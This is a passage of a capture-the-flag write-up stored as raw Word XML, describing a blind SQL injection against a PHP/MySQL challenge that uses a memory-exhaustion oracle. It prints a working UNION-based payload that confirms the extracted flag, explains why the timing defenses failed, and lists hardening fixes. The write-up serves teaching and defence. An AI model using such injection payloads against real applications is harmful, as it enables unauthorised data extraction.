        <w:t xml:space="preserve">?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> transient failures caused by instance hiccups rather than logic errors, since both positions failed repeatedly in byte mode. A targeted re-read with the multi-mode primitive resolved them cleanly: position 1 returned 112, the ASCII code for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, and position 19 returned 48, the code for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Both repairs were then re-validated in byte mode and agreed with the nibble-mode reads, which is exactly the redundancy the degradation ladder was designed to provide.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Because two characters had needed repair, the flag was not t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rusted on extraction alone. The final step asked the database itself whether the recovered string was exact, using a single boolean equality request: the whole candidate string is compared inside the payload, and a fatal response means the database agrees.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="90" w:before="160" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e5c49"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 5: Full-string equality verification payload</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblBorders>
          <w:top w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:left w:val="single" w:color="3ddbb5" w:sz="12" w:space="0"/>
          <w:bottom w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:right w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:insideH w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:insideV w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="0e1712"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
              <w:left w:val="single" w:color="3ddbb5" w:sz="12" w:space="0"/>
              <w:bottom w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
              <w:right w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="200" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="5000" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">0 UNION ALL SELECT REPEAT('A', IF(((SELECT flag FROM flag)</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">      = 'pwnsec{9f5b1c7f391035d1}'), 400000, 1))</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">FROM (SELECT 1 FROM information_schema.tables a,</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                 information_schema.tables b LIMIT 800) z</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="240" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The response was a fatal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">MATCH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Combined with the per-character printability validation and the independent nibble re-reads of the two repaired positions, the flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">pwnsec{9f5b1c7f391035d1}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> satisfied three independent confirmation paths before submission.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="742"/>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="180" w:before="380" w:line="380" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="100014" w:name="_Toc100014"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0f2e24"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Why the Defense Failed</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100014"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">It is worth being fair to the challenge author: both defense layers are well-chosen against the threat model they imagine. The 2.0-second pad is a clean, correct normalizer for sub-2-second timing signals, and the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> statement killer closes the one-directional hole the pad leaves open. Together they make server-side execution time a genuinely constant observable, and most blind SQL injection writeups would end right there, declaring the challenge unsolvable by timing.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The blind spot is the assumption that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">query()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> returning normally means nothing was observable. In buffered mode the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> does heavy, attacker-sized work after the server has finished and the size of that work is a function of query </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, not query </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Three concrete configuration mistakes turned that work into a data channel, and any one of them being closed would have changed the attack's economics dramatically:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="749"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing w:after="110" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">memory_limit is finite (64 MB).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The client can be pushed over the edge deterministically, converting a query result into a binary, request-level event. An unlimited or much larger limit would have made the fatal unreliable or impossible at practical row widths.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="749"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing w:after="110" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">display_errors=on.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The crash is not just observable but descriptive: it leaks the exact allocation size, upgrading a 1-bit length oracle into a multi-bit value channel for free, and it also discloses configuration facts such as the precise memory limit.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="749"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing w:after="110" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Fatal-aborted control flow changes the response.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Even with display_errors off, the missing final echo flips the body from 4,557 bytes to roughly 4,500, so the 1-bit channel survives the attack degrades but does not die.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Notably, the author almost had it right. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">MYSQLI_REPORT_OFF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> silences SQL errors, and the constant-outp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ut design kills every data path through the application. But a fatal raised inside the driver's memory allocator is neither a SQL error nor output data it belongs to neither category the defenses were designed around, so it sailed through both untouched.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="742"/>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="180" w:before="380" w:line="380" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="100015" w:name="_Toc100015"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0f2e24"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">9. Mitigations and Hardening Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100015"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">For anyone shipping this patte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rn or hardening a real application that resembles it the fixes below are ordered by impact. The first alone would have ended the challenge before it began; the rest progressively remove the residual channels that made the memory oracle possible at all.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="749"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing w:after="110" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Use prepared statements.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The root cause is string concatenation of user input int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">o SQL. Binding id as an integer parameter makes every payload in this writeup unreachable, because the injected text can never leave the parameter's value context. This is the only fix that addresses the vulnerability itself rather than its exploitability.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="749"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing w:after="110" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Set display_errors=Off in production.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> This would not remove the oracle the body-length flip survives but it removes the free multi-bit upgrade, stops leaking configuration values such as the exact memory limit, and forces the attacker onto the slower 1-bit channel.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="749"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing w:after="110" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cap result sizes at the application layer.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> SELECT ... LIMIT, column whitelisting, or unbuffered reads via use_result() prevent any single request from accumulating an attacker-sized result set in memory. If the client never buffers, the client can never be OOM-killed on purpose.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="749"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing w:after="110" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Keep memory_limit sane relative to max_allowed_packet.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> If the largest row the database can send is smal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ler than the PHP memory headroom, the deterministic fatal becomes unreachable. The challenge's 16-64 MB packet versus a 64 MB limit sits in the worst possible ratio; a limit of several hundred MB or a packet cap of 1-2 MB would both have broken the oracle.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="749"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing w:after="110" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Keep the statement killer, but do not rely on it.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> It is a timing defense, and this attack is not a timing attack. Its real contribution was forcing the attacker onto a noisier, more request-hungry channel valuable friction, but not a boundary.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="749"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing w:after="110" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Apply least privilege to the DB account.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> user account could read information_schema across the entire server, which made enumeration trivial once any oracle existed. Schema-level GRANTs would not have stopped the attack but would have slowed reconnaissance and reduced what one injection can map.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The general lesson generalizes well beyond this challenge: a blind oracle does not need time, it needs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">any observable difference</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
